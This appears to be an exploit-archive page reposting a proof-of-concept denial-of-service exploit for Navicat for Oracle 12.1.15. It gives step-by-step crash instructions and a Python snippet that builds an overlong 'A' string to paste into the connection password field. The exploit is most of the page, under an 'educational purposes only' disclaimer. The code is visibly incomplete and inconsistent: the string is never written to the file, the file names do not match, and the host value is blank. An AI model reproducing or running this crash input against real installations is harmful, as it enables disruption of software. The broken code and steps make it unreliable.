Navicat for oracle 12.1.15 "password" denial of service (poc) Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2019-02-15 |
Type : dos |
Platform : windows
This exploit / vulnerability Navicat for oracle 12.1.15 "password" denial of service (poc) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#Exploit Title: Navicat for Oracle 12.1.15 - "Password" Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-02-14
#Vendor Homepage:
#Software Link:
#Tested Version: 12.1.15
#Tested on: Windows 10 Single Language x64/ Windows 7 x64 Service Pack 1
#Steps to produce the crash:
#1.- Run python code:
#2.- Open code.txt and copy content to clipboard
#2.- Open Navicat for Oracle 12.1.15
#3.- Select "Conexión"
#4.- Select "Oracle"
#5.- In "Nombre de conexión" type "Test"
#6.- In "Tipo de conexión" select "Basic"
#7.- In "Host" type
#8.- In "Puerto" type "1521"
#9.- In "Nombre del servicio" type ORCL
#10.- In "Nombre de usuario" type "user"
#11.- In "Contraseña" Paste Clipboard
#12.- Select "Aceptar"
#13.- Crashed
cod = "\x41" * 550
f = open('string.txt', 'w')
Navicat for oracle 12.1.15 "password" denial of service (poc)